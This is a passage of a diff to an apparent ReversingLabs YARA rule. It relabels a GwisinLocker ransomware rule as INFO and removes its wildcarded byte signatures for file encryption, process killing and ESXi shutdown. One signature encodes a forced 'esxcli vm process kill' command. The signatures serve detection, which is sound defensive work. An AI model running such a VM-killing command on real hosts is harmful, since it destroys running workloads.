+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13818-L13836"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "87e314d14361f56935b7a8fb93468cfaf2c73e16c25d68a61ec80ad9334d3115"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "GwisinLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$init_key_v1 = {
-            55 57 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D 74 24 ?? 56 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 31 FF 83 EC ?? 56 E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 89
-            F8 5B 5E 5F 5D C3 66 90 31 D2 31 C0 89 54 04 ?? 83 C0 ?? 83 F8 ?? 72 ?? 83 EC ?? 8D
-            83 ?? ?? ?? ?? 50 8D 83 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 C5 8D 7C 24 ?? 85
-            C0 74 ?? 50 6A ?? 6A ?? 57 E8 ?? ?? ?? ?? 89 2C 24 E8 ?? ?? ?? ?? 83 C4 ?? 83 EC ??
-            6A ?? 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? C7 04 24 ?? ?? ?? ?? 83 EC ?? 8D 44
-            24 ?? 50 FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 6A ?? FF B3
-            ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 56 FF B3 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            0F 94 C0 0F B6 C0 89 C7 E9
-        }
-		$encrypt_files_v1_p1 = {
-            55 B9 ?? ?? ?? ?? 57 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8B 84
-            24 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8B 84 24
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 8D 44 24 ?? 83 EC ?? 89 44 24 ?? 89
-            C7 31 C0 F3 AB C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? 6A ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 89 44
-            24 ?? 8D 84 24 ?? ?? ?? ?? 89 44 24 ?? 31 FF 83 EC ?? 68 ?? ?? ?? ?? FF 74 24 ?? E8
-            ?? ?? ?? ?? 58 5A 6A ?? FF 74 24 ?? E8 ?? ?? ?? ?? 59 5E 6A ?? FF 74 24 ?? E8 ?? ??
-            ?? ?? 81 C4 ?? ?? ?? ?? 89 F8 5B 5E 5F 5D C3 8D 74 26 ?? 90 83 EC ?? 6A ?? 8D 84 24
-            ?? ?? ?? ?? 89 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D B4 24 ?? ?? ?? ?? 89 74 24 ??
-            85 C0 74 ?? 83 EC ?? 6A ?? FF 74 24 ?? 56 E8 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 59 5E 50
-            89 C5 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? 89 C6 83 C4 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 50 89 C7 FF B4 24 ??
-            ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 01 FA 89 D0 8B 54
-            24 ?? 89 10 0F B7 54 24 ?? 66 89 50 ?? 0F B6 54 24 ?? 88 50 ?? 8B 94 24 ?? ?? ?? ??
-            C6 44 3A ?? ?? BF ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ??
-            ?? ?? ?? B9 ?? ?? ?? ?? 83 C4 ?? 39 C1 B9 ?? ?? ?? ?? 19 D1 7D ?? 83 EC ?? FF B4 24
-            ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? FF 74
-            24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D 74 26 ?? 90 83 EC ?? 56 E8 ?? ?? ??
-            ?? 58 5A 55 FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? 89 C6 83 C4 ?? 85 C0 0F
-        }
-		$encrypt_files_v1_p2 = {
-            84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 8B 74 24
-            ?? 8B 7C 24 ?? 89 D1 89 74 24 ?? 89 7C 24 ?? 83 C4 ?? 39 F0 19 F9 7D ?? 89 44 24 ??
-            89 54 24 ?? 8B 7C 24 ?? 8B 74 24 ?? 89 F9 89 F5 C1 F9 ?? 89 C8 89 4C 24 ?? 31 CD 8B
-            74 24 ?? C1 F8 ?? 89 44 24 ?? 89 E8 29 F0 8B 74 24 ?? 89 C7 83 E7 ?? 31 CF 89 F8 8B
-            7C 24 ?? 29 F0 8B 74 24 ?? 89 FA 19 FA 8B 7C 24 ?? 29 C6 89 74 24 ?? 19 D7 83 EC ??
-            89 7C 24 ?? 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 31 C0 F3 AB 89 94 24 ?? ?? ?? ?? 56 6A ?? FF 74
-            24 ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 C7 85 C0 0F 84 ?? ?? ?? ?? 83
-            EC ?? FF 74 24 ?? E8 ?? ?? ?? ?? 5F 5D FF B4 24 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4
-            ?? 89 C7 85 C0 0F 84 ?? ?? ?? ?? 8B B4 24 ?? ?? ?? ?? 8B 54 24 ?? 31 FF 8B 44 24 ??
-            89 7C 24 ?? 89 74 24 ?? 8D 74 24 ?? 89 D7 89 74 24 ?? 8D B3 ?? ?? ?? ?? 09 C7 89 74
-        }
-		$encrypt_files_v1_p3 = {
-            24 ?? 0F 84 ?? ?? ?? ?? 8B 4C 24 ?? 8B 6C 24 ?? 89 4C 24 ?? EB ?? 66 90 83 EC ?? 31
-            ED FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF 74 24 ?? FF 74
-            24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 31 D2 6A ?? 8B 84 24 ?? ?? ?? ?? 52 F7 D8
-            50 57 E8 ?? ?? ?? ?? 57 FF B4 24 ?? ?? ?? ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B 44 24 ?? 8B BC 24 ?? ?? ?? ?? 8B 54 24 ?? 29 F8 19 EA 89 44 24 ?? 89 D6 89 54
-            24 ?? 83 C4 ?? 09 C6 74 ?? 39 84 24 ?? ?? ?? ?? 89 E9 8B 7C 24 ?? 19 D1 0F 4C 84 24
-            ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ??
-            ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 44 24 ?? 57
-            FF B4 24 ?? ?? ?? ?? 6A ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 39 84 24 ??
-            ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 EC ?? BF ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4
-            ?? E9 ?? ?? ?? ?? 83 EC ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? E9
-        }
-		$find_files_v1_p1 = {
-            55 89 C5 57 E8 ?? ?? ?? ?? 81 C7 ?? ?? ?? ?? 56 53 81 EC ?? ?? ?? ?? 89 54 24 ?? 8B
-            B4 24 ?? ?? ?? ?? 89 7C 24 ?? 89 FB 89 4C 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 44 24
-            ?? C7 44 24 ?? ?? ?? ?? ?? 85 C0 74 ?? 8D 58 ?? 80 7C 05 ?? ?? 0F 45 D8 89 5C 24 ??
-            8B BC 24 ?? ?? ?? ?? 83 E7 ?? 74 ?? 83 EC ?? 8D 44 24 ?? 89 44 24 ?? 50 55 6A ?? 8B
-            5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 8B 00 83 F8
-            ?? 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? EB ?? 8D
-            B4 26 ?? ?? ?? ?? 66 90 83 EC ?? 8D 44 24 ?? 89 44 24 ?? 50 55 6A ?? 8B 5C 24 ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 78 ?? 8B 84 24 ?? ?? ?? ?? 25 ?? ?? ?? ?? 3D ?? ?? ?? ??
-            0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? C6 44 24 ?? ?? 31 FF C7 44 24 ??
-            ?? ?? ?? ?? 8B 54 24 ?? 8B 44 24 ?? F6 84 24 ?? ?? ?? ?? ?? 74 ?? 85 F6 0F 84 ?? ??
-            ?? ?? 8B 4E ?? 8B 5E ?? 31 D1 31 C3 09 CB 0F 84 ?? ?? ?? ?? 31 FF 81 C4 ?? ?? ?? ??
-            89 F8 5B 5E 5F 5D C3 8D 74 26 ?? 90 8B 5C 24 ?? E8 ?? ?? ?? ?? 89 C7 8B 00 83 F8 ??
-            0F 85 ?? ?? ?? ?? 83 EC ?? FF 74 24 ?? 55 6A ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 0F 85 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ??
-            ?? ?? ?? 8D 74 26 ?? 90 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ??
-            ?? ?? 89 74 24 ?? 89 44 24 ?? 89 54 24 ?? 85 F6 0F 84 ?? ?? ?? ?? 8B 46 ?? 8B 4C 24
-            ?? 83 C0 ?? 83 C1 ?? 89 44 24 ?? 89 44 24 ?? 8B 46 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44
-        }
-		$find_files_v1_p2 = {
-            24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 8B
-            84 24 ?? ?? ?? ?? 83 E0 ?? 89 44 24 ?? 75 ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ??
-            55 8B 44 24 ?? FF D0 89 C7 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 85 F6 74 ?? 8B 84 24 ??
-            ?? ?? ?? 8B 5C 24 ?? 89 6C 24 ?? 8B 4C 24 ?? 8B BC 24 ?? ?? ?? ?? 89 C5 EB ?? 8D B6
-            ?? ?? ?? ?? 8B 36 85 F6 74 ?? 8B 46 ?? 8B 56 ?? 31 D8 31 CA 09 C2 75 ?? 8B 46 ?? 8B
-            56 ?? 31 E8 31 FA 09 C2 0F 84 ?? ?? ?? ?? 8B 36 85 F6 75 ?? 8B 6C 24 ?? 8B 7C 24 ??
-            85 FF 74 ?? 80 7C 24 ?? ?? 0F 85 ?? ?? ?? ?? 8B 44 24 ?? C6 44 05 ?? ?? 8B 44 24 ??
-            85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? 55 8B 44 24 ?? FF D0
-            83 C4 ?? 89 C7 81 C4 ?? ?? ?? ?? 89 F8 5B 5E 5F 5D C3 66 90 83 EC ?? 6A ?? 55 8B 5C
-            24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 44 24 ?? 89 C7 E8 ?? ?? ?? ?? 8B 00 89 44 24 ??
-            83 C4 ?? 85 FF 79 ?? 83 F8 ?? 0F B6 4C 24 ?? BA ?? ?? ?? ?? 0F 94 C0 84 C0 B8 ?? ??
-            ?? ?? 0F 44 44 24 ?? 0F 45 CA 89 44 24 ?? 88 4C 24 ?? 8B 44 24 ?? 85 C0 0F 85 ?? ??
-            ?? ?? 83 EC ?? FF 74 24 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8D B4
-            26 ?? ?? ?? ?? 8D 76 ?? 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89 44 24 ?? 8B 84 24 ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 44 24 ?? 89 54 24 ?? 8B 44 24 ?? C7 44 24 ?? ?? ??
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D 48 ?? 89 4C 24 ?? 89 4C 24 ?? 85 C0 74 ?? 80 7C 05
-            ?? ?? 74 ?? E9 ?? ?? ?? ?? 8D 76 ?? 80 7C 05 ?? ?? 0F 85 ?? ?? ?? ?? 83 E8 ?? 75 ??
-            31 D2 89 54 24 ?? E9 ?? ?? ?? ?? 8D 74 26 ?? 90 89 54 24 ?? 8B 94 24 ?? ?? ?? ?? 89
-        }
-		$find_files_v1_p3 = {
-            44 24 ?? 8B 84 24 ?? ?? ?? ?? 89 74 24 ?? 89 44 24 ?? 89 54 24 ?? E9 ?? ?? ?? ?? 90
-            8B 84 24 ?? ?? ?? ?? BF ?? ?? ?? ?? C6 44 24 ?? ?? 83 E0 ?? 83 F8 ?? 19 C0 83 E0 ??
-            83 C0 ?? 89 44 24 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 90 8B 74 24 ?? 85 F6 0F 88
-            ?? ?? ?? ?? 83 EC ?? FF 74 24 ?? 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 C6 85 C0 0F
-            84 ?? ?? ?? ?? B8 ?? ?? ?? ?? 2B 44 24 ?? 89 44 24 ?? 8D B4 26 ?? ?? ?? ?? 8D 76 ??
-            83 EC ?? 56 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 80 78 ?? ??
-            0F 84 ?? ?? ?? ?? 83 EC ?? 8D 78 ?? 57 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 3B 44 24
-            ?? 0F 83 ?? ?? ?? ?? 8B 44 24 ?? 83 EC ?? C6 44 05 ?? ?? 57 8B 44 24 ?? 01 E8 50 8B
-            5C 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 5A 5B 8D 48 ?? 8D 44 24 ?? 50 89 E8 FF B4 24 ??
-            ?? ?? ?? 8B 54 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 89 C7
-            56 8B 5C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 66 90 80 78 ?? ?? 0F 84 ?? ??
-            ?? ?? 66 83 78 ?? ?? 0F 85 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D B6 ?? ?? ?? ?? 80 7C 05 ??
-            ?? 8D 48 ?? 89 C2 0F 84 ?? ?? ?? ?? 85 C9 0F 84 ?? ?? ?? ?? 80 7C 05 ?? ?? 8D 50 ??
-            75 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 66 90 89 C2 85 D2 0F 84 ?? ?? ?? ?? 80 7C
-            15 ?? ?? 8D 42 ?? 75 ?? E9 ?? ?? ?? ?? 8D B4 26 ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ??
-            31 FF C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 EC ?? 56 8B 5C 24 ??
-            E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 07 E9 ?? ?? ?? ?? 8B 7C 24 ?? 89 FB BF ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C7 00 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? E9 ??
-            ?? ?? ?? BF
-        }
-		$kill_processes_v1_p1 = {
-            55 BA ?? ?? ?? ?? B8 ?? ?? ?? ?? BD ?? ?? ?? ?? 57 89 E9 56 53 E8 ?? ?? ?? ?? 81 C3
-            ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 66 89 54 24 ?? 8D 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24
-            ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44
-            24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 66 89 44 24 ??
-            C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ??
-            ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? 8B 83 ?? ?? ?? ??
-            89 44 24 ?? 8B 83 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? F3 A5 8D B4 24 ?? ?? ?? ?? C6 44
-        }
-		$kill_processes_v1_p2 = {
-            24 ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? 89 F7 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ??
-            ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 CD C7 44 24 ?? ?? ??
-            ?? ?? B9 ?? ?? ?? ?? 89 E8 F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ??
-            ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ??
-            ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8
-            B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89
-            34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7
-            8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ??
-            ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D 84 24 ?? ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 89 34
-            24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ?? F3 AB FF B4 24 ?? ?? ?? ?? 89 F7 8D
-            44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ?? 83 C4 ?? 89 E8 B9 ?? ?? ?? ??
-            F3 AB FF B4 24 ?? ?? ?? ?? 8D 44 24 ?? 50 56 E8 ?? ?? ?? ?? 89 34 24 E8 ?? ?? ?? ??
-            81 C4 ?? ?? ?? ?? 5B 5E 5F 5D C3
-        }
-		$shut_down_esxi_v1 = {
-            55 B8 ?? ?? ?? ?? BD ?? ?? ?? ?? 57 89 C1 56 53 E8 ?? ?? ?? ?? 81 C3 ?? ?? ?? ?? 81
-            EC ?? ?? ?? ?? 8D 7C 24 ?? C7 44 24 ?? 65 73 78 63 C7 44 24 ?? 6C 69 20 76 C7 44 24
-            ?? 6D 20 70 72 8D B3 ?? ?? ?? ?? C7 44 24 ?? 6F 63 65 73 F3 A5 8D B4 24 ?? ?? ?? ??
-            C7 44 24 ?? 73 20 6B 69 83 EC ?? 89 F7 C7 44 24 ?? 6C 6C 20 2D C7 44 24 ?? 2D 74 79
-            70 C7 44 24 ?? 65 3D 66 6F C7 44 24 ?? 72 63 65 20 C7 44 24 ?? 2D 2D 77 6F 89 C8 B9
-            ?? ?? ?? ?? C7 44 24 ?? 72 6C 64 2D C7 44 24 ?? 69 64 3D 22 C7 84 24 ?? ?? ?? ?? 25
-            73 22 00 C7 44 24 ?? 5B 45 53 58 C7 44 24 ?? 69 5D 20 53 C7 44 24 ?? 68 75 74 74 C7
-            44 24 ?? 69 6E 67 20 C7 44 24 ?? 64 6F 77 6E F3 AB C7 44 24 ?? 20 2D 20 25 8D 83 ??
-            ?? ?? ?? 66 89 6C 24 ?? C6 44 24 ?? ?? 50 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 0F 84 ?? ?? ?? ?? BF ?? ?? ?? ?? 89 C5 8D 44 24 ?? 66 89 7C 24 ?? 31 FF
-        }
-		$kill_processes_v2_p1 = {
-            41 54 BA ?? ?? ?? ?? B9 ?? ?? ?? ?? 45 31 E4 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 55 48 89
-            FD 53 48 81 EC ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 48 89 84 24 ?? ?? ?? ?? B8 ?? ??
-            ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F
-            6F 05 ?? ?? 00 00 48 89 DF 66 89 44 24 ?? 48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 0F 29 44 24
-            ?? 66 0F 6F 05 ?? ?? 00 00 66 89 54 24 ?? 48 89 EA 0F 29 44 24 ?? 66 0F 6F 05 ?? ??
-            00 00 66 89 8C 24 ?? ?? 00 00 B9 ?? ?? ?? ?? 0F 29 44 24 ?? 66 0F 6F 05 ?? ?? 00 00
-            C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C6
-            84 24 ?? ?? ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C7 44 24 ?? ??
-            ?? ?? ?? 0F 29 84 24 ?? ?? ?? ?? 66 0F 6F 05 ?? ?? 00 00 C6 44 24 ?? ?? 0F 29 84 24
-            ?? ?? ?? ?? C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C6 44 24 ?? ?? C7 84 24 ?? ?? ??
-            ?? ?? ?? ?? ?? C6 84 24 ?? ?? ?? ?? ?? 48 89 44 24 ?? 48 B8
-        }
-		$kill_processes_v2_p2 = {
-            48 89 44 24 ?? 4C 89 E0 F3 48 AB 48 89 DF C6 44 24 ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7
-            44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ??
-            ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ??
-            ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8
-            ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D
-            74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF
-            B9 ?? ?? ?? ?? F3 48 AB 48 8D B4 24 ?? ?? ?? ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48
-            89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ?? F3 48 AB 48 8D 74 24 ?? 48 89
-            EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 89 E0 48 89 DF B9 ?? ?? ?? ??
-            F3 48 AB 48 8D 74 24 ?? 48 89 EA 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48
-            81 C4 ?? ?? ?? ?? 5B 5D 41 5C C3
-        }
-		$encrypt_files_v2_p1 = {
-            48 B8 ?? ?? ?? ?? ?? ?? ?? ?? 41 57 66 0F EF C0 49 89 FF 41 56 49 89 D6 41 55 49 89
-            F5 BE ?? ?? ?? ?? 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 5C 24 ?? 48 89 4C 24 ?? 48
-            8D AC 24 ?? ?? ?? ?? 48 89 DF 4C 89 04 24 0F 29 44 24 ?? 0F 29 44 24 ?? 0F 29 44 24
-            ?? 48 C7 44 24 ?? ?? ?? ?? ?? 0F 29 44 24 ?? 48 89 44 24 ?? E8 ?? ?? ?? ?? 85 C0 75
-            ?? 45 31 E4 48 89 EF BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF BE ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 8D 7B ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 44 89 E0 5B 5D
-            41 5C 41 5D 41 5E 41 5F C3 0F 1F 80 ?? ?? ?? ?? 48 8D 7B ?? BE ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 85 C0 74 ?? BA ?? ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 48 8D 35 ?? ?? ??
-            ?? 4C 89 FF E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 85 C0 0F 84 ?? ?? ?? ?? 4C 89 FF E8 ??
-            ?? ?? ?? 4C 89 FE 4C 89 EF 48 89 C2 49 89 C4 E8 ?? ?? ?? ?? 8B 54 24 ?? 4B 8D 44 25
-            ?? 31 F6 89 10 0F B7 54 24 ?? 66 89 50 ?? 0F B6 54 24 ?? 88 50 ?? BA ?? ?? ?? ?? 43
-            C6 44 25 ?? ?? 4C 8B 64 24 ?? 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24 ?? 45 31
-            E4 E8 ?? ?? ?? ?? 48 83 F8 ?? 7E ?? 4C 89 EE 4C 89 FF E8 ?? ?? ?? ?? 85 C0 74 ?? 48
-            8B 7C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 48 8B 7C 24 ?? E8 ?? ??
-            ?? ?? 48 8D 35 ?? ?? ?? ?? 4C 89 EF E8 ?? ?? ?? ?? 48 89 44 24 ?? 49 89 C4 48 85 C0
-        }
-		$encrypt_files_v2_p2 = {
-            0F 84 ?? ?? ?? ?? 31 F6 BA ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 4C 89 E7 4C 89 64 24
-            ?? E8 ?? ?? ?? ?? 48 39 44 24 ?? 48 0F 4E 44 24 ?? 48 8D 7C 24 ?? 48 89 C1 48 C1 F9
-            ?? 48 C1 E9 ?? 48 8D 14 08 83 E2 ?? 48 29 CA 48 29 D0 48 89 44 24 ?? E8 ?? ?? ?? ??
-            48 8D BC 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 89 DE 48 89 44 24 ?? 31 C0 BA ?? ?? ?? ??
-            F3 48 AB 48 8D 84 24 ?? ?? ?? ?? 48 8B 3C 24 48 89 C1 48 89 44 24 ?? E8 ?? ?? ?? ??
-            41 89 C4 85 C0 0F 84 ?? ?? ?? ?? 48 8B 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 4C 89
-            EE E8 ?? ?? ?? ?? 41 89 C4 85 C0 0F 84 ?? ?? ?? ?? 48 8B 44 24 ?? 4C 8D 64 24 ?? 48
-            85 C0 75 ?? E9 ?? ?? ?? ?? 0F 1F 80 ?? ?? ?? ?? 4D 89 F1 4D 89 E8 4C 89 E9 4C 89 E2
-            48 89 EE 48 8D 3D ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 F6 BA ?? ?? ?? ?? 4C 89 FF 48 F7
